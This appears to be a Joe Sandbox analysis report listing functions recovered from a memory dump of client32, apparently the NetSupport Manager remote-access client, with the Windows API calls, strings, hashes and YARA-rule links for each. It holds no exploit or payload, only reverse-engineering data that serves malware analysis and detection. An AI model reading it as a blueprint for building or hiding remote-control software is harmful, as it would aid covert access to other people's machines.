Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemWindow$Text_strncpy$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimer__wcstoi64_memsetwsprintf
String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
API String ID: 1946598539-1930157642
Opcode ID: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
Opcode Fuzzy Hash: 36586b8c2c426586482cacd975a0e985f9ba10f583d6a2bbae21fd93714aeaa3
Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90

Function 1104F2F0 Relevance: 44.1, APIs: 18, Strings: 7, Instructions: 316filepipethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F

wsprintfA.USER32 ref: 1104F394
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
GetLastError.KERNEL32 ref: 1104F3C8
SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,CF3D35D0), ref: 1104F40B
CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC

Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13

GetDC.USER32(00000000), ref: 1104F4FA
GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
ReleaseDC.USER32(00000000,?), ref: 1104F5C8
GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
GetSystemMetrics.USER32(0000004D), ref: 1104F5E0

Strings

CLTCONN.CPP, xrefs: 1104F420
CacheSize, xrefs: 1104F50D
Error creating hShowPipe, e=%d, xrefs: 1104F3CF
idata->hShowEvent, xrefs: 1104F425
Show enabling mirror, xrefs: 1104F74E
View, xrefs: 1104F514
\\.\pipe\nsm_ctl32_show_%d, xrefs: 1104F38E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
API String ID: 1070019554-2085025582
Opcode ID: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
Opcode Fuzzy Hash: 5f45de50552793b09d71f5256d2afdcc192636d6157d8be2c852f61d00b194e5
Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51

Function 1109D0D0 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 278COMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
CloseHandle.KERNEL32(00000000), ref: 1109D180
ResetEvent.KERNEL32(?), ref: 1109D195
ResetEvent.KERNEL32(?), ref: 1109D19B
SetEvent.KERNEL32(?), ref: 1109D1A1

Strings

timeout, xrefs: 1109D246
deadshare, xrefs: 1109D217
no error, xrefs: 1109D3BA
cbdata=%d, datalen-sizeof=%d, xrefs: 1109D303
iffy result, xrefs: 1109D425
senderror, xrefs: 1109D3FF
..\CTL32\ipc.cpp, xrefs: 1109D31A

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
API String ID: 1194186020-3727536503
Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60

Function 11005390 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D470: __itow.LIBCMT ref: 1105D495

GetObjectA.GDI32(?,0000003C,?), ref: 11005465

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

wsprintfA.USER32 ref: 110054BD
DeleteObject.GDI32(?), ref: 11005512
DeleteObject.GDI32(?), ref: 1100551B
SelectObject.GDI32(?,?), ref: 11005532
DeleteObject.GDI32(?), ref: 11005538
DeleteDC.GDI32(?), ref: 1100553E
SelectObject.GDI32(?,?), ref: 1100554F
DeleteObject.GDI32(?), ref: 11005558
DeleteDC.GDI32(?), ref: 1100555E
DeleteObject.GDI32(?), ref: 1100556F
DeleteObject.GDI32(?), ref: 1100559A
DeleteObject.GDI32(?), ref: 110055B8
DeleteObject.GDI32(?), ref: 110055C1
ShowWindow.USER32(?,00000009), ref: 110055EF
PostQuitMessage.USER32(00000000), ref: 110055F7

Strings

PenWidth, xrefs: 1100540D
PenStyle, xrefs: 110053EF
Tool, xrefs: 110053B3
FillStyle, xrefs: 11005449
FillColour, xrefs: 1100542B
Annotate, xrefs: 110053B8, 110053D6, 110053F4, 11005412, 11005430, 1100544E, 110054D4
PenColour, xrefs: 110053D1
Font, xrefs: 110054CF
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 110054B7

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 3453958691-770455996
Opcode ID: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
Opcode Fuzzy Hash: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60

Function 11015470 Relevance: 43.7, APIs: 29, Instructions: 170COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 1101549F
GetWindowRect.USER32(?,?), ref: 110154B7
_memset.LIBCMT ref: 110154C5
CreateFontIndirectA.GDI32(?), ref: 110154E1
SelectObject.GDI32(00000000,00000000), ref: 110154F5
SetBkMode.GDI32(00000000,00000001), ref: 11015500
BeginPath.GDI32(00000000), ref: 1101550D
TextOutA.GDI32(00000000,00000000,00000000), ref: 11015530
EndPath.GDI32(00000000), ref: 11015537
PathToRegion.GDI32(00000000), ref: 1101553E
CreateSolidBrush.GDI32(?), ref: 11015550
CreateSolidBrush.GDI32(?), ref: 11015566
CreatePen.GDI32(00000000,00000002,?), ref: 11015580
SelectObject.GDI32(00000000,00000000), ref: 1101558E
SelectObject.GDI32(00000000,?), ref: 1101559E
GetRgnBox.GDI32(00000000,?), ref: 110155AB
OffsetRgn.GDI32(00000000,?,00000000), ref: 110155CA
FillRgn.GDI32(00000000,00000000,?), ref: 110155D9
FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110155EC
DeleteObject.GDI32(00000000), ref: 110155F9
SelectObject.GDI32(00000000,?), ref: 11015603
SelectObject.GDI32(00000000,?), ref: 1101560D
DeleteObject.GDI32(?), ref: 11015616
DeleteObject.GDI32(?), ref: 1101561F
DeleteObject.GDI32(?), ref: 11015628
SelectObject.GDI32(00000000,?), ref: 11015632
DeleteObject.GDI32(?), ref: 1101563B
SetBkMode.GDI32(00000000,?), ref: 11015645
EndPaint.USER32(?,?), ref: 11015659

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
String ID:
API String ID: 3702029449-0
Opcode ID: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
Instruction ID: 1c6fdd3f784209e1156a4ff31251cb138f082964e1cd822c4cbcc4281ff6dda7
Opcode Fuzzy Hash: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
Instruction Fuzzy Hash: 2851FC75A01229AFDB11DBA4CC88FAEF7B9FF89304F108199F605D7244DB749A448F62

Function 110457D0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 345timewindowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(00000000,?,00000040), ref: 11045830
GetDlgItem.USER32(00000000,?), ref: 1104586E
SetWindowTextA.USER32(00000000,00000000), ref: 110458C3
SetDlgItemTextA.USER32(00000000,?,?), ref: 110458E0
SetDlgItemTextA.USER32(00000000,0000046D,?), ref: 110458F5
SetDlgItemTextA.USER32(00000000,0000047B,00000000), ref: 1104591B
GetDlgItem.USER32(00000000,?), ref: 110459A0
GetDlgItem.USER32(00000000,00000001), ref: 110459FD
ShowWindow.USER32(00000000), ref: 11045A00
SetWindowPos.USER32(00000000,00000001,-0000000A,-0000000A,00000000,00000000,00000041,00000000), ref: 11045A83
SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11045947

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

SetWindowPos.USER32(00000000,000000FF,?,00000000,00000000,00000000,00000041), ref: 11045AC8
BringWindowToTop.USER32(?), ref: 11045ADC

Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E

MessageBeep.USER32(000000FF), ref: 11045AED

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

GetSystemMetrics.USER32(0000000C), ref: 11045B51
GetSystemMetrics.USER32(0000000B), ref: 11045B56
LoadImageA.USER32(00000000,00000483,00000001,00000000), ref: 11045B66
DestroyCursor.USER32(00000000), ref: 11045B8D

Strings

Create Message Dialog, xrefs: 11045836
m_hWnd, xrefs: 11045819, 110458B1, 1104592D, 11045A62, 11045AA7
CLTCONN.CPP, xrefs: 110459BF
Register for log off event, xrefs: 11045AF3
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11045814, 110458AC, 11045928, 11045A5D, 11045AA2
m_idata, xrefs: 110459C4

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$Text$MessageMetricsSystem_memsetwsprintf$BeepBringCursorDestroyErrorExitForegroundImageLastLoadOpenProcessShowTimerVersion_strncpy
String ID: CLTCONN.CPP$Create Message Dialog$Register for log off event$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_idata
API String ID: 220503532-926533556
Opcode ID: 5d5a12d8fcf2b9508c933e6e3dc1f8ac37777a2d10d860efabfe54c1e244523e
Instruction ID: fbb7bb46882f2f9d323433b6bf250fd0ae6c3b835bfed70dc686f61fe2a867e7
Opcode Fuzzy Hash: 5d5a12d8fcf2b9508c933e6e3dc1f8ac37777a2d10d860efabfe54c1e244523e
Instruction Fuzzy Hash: 07C1B475B00716AFE711CBA5CCC1FAAF7E9AF44708F108468F6259B680EB75E940CB51

Function 110037B0 Relevance: 40.7, APIs: 27, Instructions: 240COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 1100380F
InflateRect.USER32(?,000000FF,000000FF), ref: 1100382A
GetSysColor.USER32(00000010), ref: 1100383D
GetSysColor.USER32(00000010), ref: 11003854
GetSysColor.USER32(00000014), ref: 1100386B
GetSysColor.USER32(00000014), ref: 11003882
GetSysColor.USER32(00000014), ref: 110038A5
GetSysColor.USER32(00000014), ref: 110038BC
GetSysColor.USER32(00000010), ref: 110038D3
GetSysColor.USER32(00000010), ref: 110038EA
GetSysColor.USER32(00000004), ref: 11003901
SetBkColor.GDI32(00000000,00000000), ref: 11003908
InflateRect.USER32(?,000000FE,000000FD), ref: 11003916
GetSysColor.USER32(00000010), ref: 11003932
CreatePen.GDI32(?,00000001,00000000), ref: 1100393B
SelectObject.GDI32(00000000,00000000), ref: 11003949
MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003962
LineTo.GDI32(00000000,?,?), ref: 11003976
SelectObject.GDI32(00000000,?), ref: 11003984
DeleteObject.GDI32(?), ref: 1100398E
GetSysColor.USER32(00000014), ref: 1100399C
CreatePen.GDI32(?,00000001,00000000), ref: 110039A5
SelectObject.GDI32(00000000,00000000), ref: 110039B2
MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039CE
LineTo.GDI32(00000000,?,?), ref: 110039E5
SelectObject.GDI32(00000000,?), ref: 110039F3
DeleteObject.GDI32(00000000), ref: 110039FA

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
String ID:
API String ID: 1903512896-0
Opcode ID: 1ab8ec13b9c3d8d80ecb74cf7a7032847e3083b317342f6409bc525a428a3736
Instruction ID: 3027e757ba1171f6112b6b60bda5e7e925a43277d9ff2db94d61a7c43587e01c
Opcode Fuzzy Hash: 1ab8ec13b9c3d8d80ecb74cf7a7032847e3083b317342f6409bc525a428a3736
Instruction Fuzzy Hash: B2814FB590030AAFDB14DFA4CC85FBFF7B9EF88304F104A58E611A7285D671A945CBA1

Function 110492D0 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 280COMMON

Download Yara Rule

APIs

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565

GetCursorPos.USER32(?), ref: 11049334
WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
WaitForInputIdle.USER32(?,000003E8), ref: 11049488
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
GetCursorPos.USER32(?), ref: 110494AD
EnumWindows.USER32(110425D0,?), ref: 11049504
GetWindowRect.USER32(?,?), ref: 11049520
WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
GetClassNameA.USER32(00000000,?,00000040), ref: 11049549

Strings

ActivateStui=%d, @%d,%d, actwin=%x [%s], xrefs: 11049387
NSMCoolbar, xrefs: 11049394, 11049574
*ExitMetroCloseDelay, xrefs: 11049619
"%sNSClientTB.exe", xrefs: 11049431
', xrefs: 110495C2
*ExitMetroBreak, xrefs: 110494BE
Client, xrefs: 110494CF, 1104961E
ActivateStui=-1, @%d,%d, actwin=%x [%s], xrefs: 11049567

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
